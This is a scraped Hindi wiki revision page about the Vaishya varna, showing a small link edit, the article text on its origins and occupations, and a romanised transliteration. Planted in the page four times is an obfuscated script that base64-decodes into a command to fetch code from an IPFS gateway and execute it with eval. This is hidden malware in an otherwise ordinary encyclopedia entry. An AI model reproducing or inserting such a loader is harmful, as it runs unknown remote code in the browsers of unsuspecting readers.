Difference between revisions of "वैश्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " वाणिज्य " to " वाणिज्य ")
Line 1: Line 1:
 
{{tocright}}
 
{{tocright}}
[[हिंदू|हिंदुओं]] की वर्ण व्यवस्था में [[वैश्य]] का तीसरा स्थान है। वैश्य वर्ण के लोग मुख्यतया वाणिज्य व्यवसाय और [[कृषि]] करते थे। हिंदुओं की जाति व्यवस्था के अंतर्गत '''वैश्य''' वर्णाश्रम का तीसरा महत्त्वपूर्ण स्तंभ है। इस वर्ग में मुख्य रूप से भारतीय समाज के किसान, पशुपालक, और व्यापारी समुदाय शामिल है।  
+
[[हिंदू|हिंदुओं]] की वर्ण व्यवस्था में [[वैश्य]] का तीसरा स्थान है। वैश्य वर्ण के लोग मुख्यतया [[वाणिज्य]] व्यवसाय और [[कृषि]] करते थे। हिंदुओं की जाति व्यवस्था के अंतर्गत '''वैश्य''' वर्णाश्रम का तीसरा महत्त्वपूर्ण स्तंभ है। इस वर्ग में मुख्य रूप से भारतीय समाज के किसान, पशुपालक, और व्यापारी समुदाय शामिल है।  
 
अर्थ की दृष्टि से इस शब्द की उत्पत्ति [[संस्कृत]] से हुई है जिसका मूल अर्थ "बसना" होता है। [[मनु]] के [[मनुस्मृति]] के अनुसार वैश्यों की उत्पत्ति [[ब्रह्मा]] के उदर यानि पेट से हुई है। [[ब्रह्मा]] जी से पैदा होने वाले [[ब्राह्मण]] कहलाए, [[विष्णु]] से पैदा होने वाले वैश्य, [[शंकर]] जी से पैदा होने वाले क्षत्रिय, इसलिये आज भी ब्राह्मण अपनी माता [[सरस्वती]], वैश्य [[लक्ष्मी]], [[क्षत्रिय]] [[दुर्गा|माँ दुर्गे]] की पूजा करते है।
 
अर्थ की दृष्टि से इस शब्द की उत्पत्ति [[संस्कृत]] से हुई है जिसका मूल अर्थ "बसना" होता है। [[मनु]] के [[मनुस्मृति]] के अनुसार वैश्यों की उत्पत्ति [[ब्रह्मा]] के उदर यानि पेट से हुई है। [[ब्रह्मा]] जी से पैदा होने वाले [[ब्राह्मण]] कहलाए, [[विष्णु]] से पैदा होने वाले वैश्य, [[शंकर]] जी से पैदा होने वाले क्षत्रिय, इसलिये आज भी ब्राह्मण अपनी माता [[सरस्वती]], वैश्य [[लक्ष्मी]], [[क्षत्रिय]] [[दुर्गा|माँ दुर्गे]] की पूजा करते है।
  

Revision as of 12:46, 13 April 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

hianduoan ki varn vyavastha mean vaishy ka tisara sthan hai. vaishy varn ke log mukhyataya vanijy vyavasay aur krishi karate the. hianduoan ki jati vyavastha ke aantargat vaishy varnashram ka tisara mahattvapoorn stanbh hai. is varg mean mukhy roop se bharatiy samaj ke kisan, pashupalak, aur vyapari samuday shamil hai. arth ki drishti se is shabd ki utpatti sanskrit se huee hai jisaka mool arth "basana" hota hai. manu ke manusmriti ke anusar vaishyoan ki utpatti brahma ke udar yani pet se huee hai. brahma ji se paida hone vale brahman kahalae, vishnu se paida hone vale vaishy, shankar ji se paida hone vale kshatriy, isaliye aj bhi brahman apani mata sarasvati, vaishy lakshmi, kshatriy maan durge ki pooja karate hai.

yah bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bhattachary, sachchidanand bharatiy itihas kosh (hiandi). lakhanoo: uttarapradesh hiandi sansthan, 442.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>